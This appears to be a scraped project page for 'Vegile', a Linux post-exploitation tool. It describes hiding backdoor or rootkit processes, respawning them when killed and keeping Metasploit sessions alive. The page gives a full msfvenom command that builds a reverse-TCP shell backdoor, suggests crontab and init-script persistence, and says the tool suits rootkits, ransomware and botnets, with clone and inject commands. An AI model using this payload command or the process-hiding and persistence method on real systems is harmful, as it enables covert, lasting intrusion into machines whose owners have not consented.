Need help with Vegile?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

Screetsec
450 Stars 131 Forks GNU General Public License v3.0 45 Commits 1 Opened issues

Description

This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell

Services available

!
?

Need anything else?

Contributors list

No Data

Vegile - Ghost In The Shell

Version Stage Build

Vegile is a tool for Post exploitation Techniques in linux. Post Exploitation techniques will ensure that we maintain some level of access and can potentially lead to deeper footholds into our targets trusted network.

Donate

  • If this project is very helpful to your penetration testing and u want to support me , you can give me a cup of coffee :)
  • Donation

:book: How it works

This tool will set up your backdoor/rootkits when backdoor is already setup it will be hidden your specific process,unlimited your session in metasploit and transparent. Even when it is killed, it will re-run again. There will always be a procces which will run another process, so we can assume that this procces is unstopable like a Ghost in The Shell

READ THIS

  • Right now I just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ it works ] or you can use thefatrat for to help you create a simple backdoor
  • msfvenom -a x86 --platform linux -p linux/x86/shell/reversetcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAMEBACKDOOR
  • for hidden process you can use for rootkits,backdoor,ransom and botnet { sh,python,perl,exe and binary }.
  • Victim target all linux distribution include ( base32 and base64 in their system )
  • For get persistence you can use crontab and xinit.d into your backdoor
  • this is just a simple algorithm how we can maintain our sessions and backdoor/rootkits , you can explore this

Getting Started

  1. git clone https://github.com/Screetsec/Vegile.git
  2. cd Vegile
  3. chmod +x Vegile

Using Vegile

Running Vegile without any parameters will give a helpful list of the most common options. you can use command :

  • Vegile -i / --inject [backdoor/rootkit]
  • Vegile -u / --unlimited [backdoor/rootkit]
  • Vegile -h / --help

Demo Video

  • Vegile demo

  • Vegile demo

:octocat: Credits

  • Thanks to allah
  • Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
  • Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .
  • Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
  • http://www.kali.org/ Kali Linux
  • gianlucaborello to give a reference and some idea [ https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/ ]
  • And another open sources tool in github

Disclaimer

Note: modifications, changes, or alterations to this sourcecode is acceptable, however, any public releases utilizing this code must be approved by writen this tool ( Edo maland ).

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.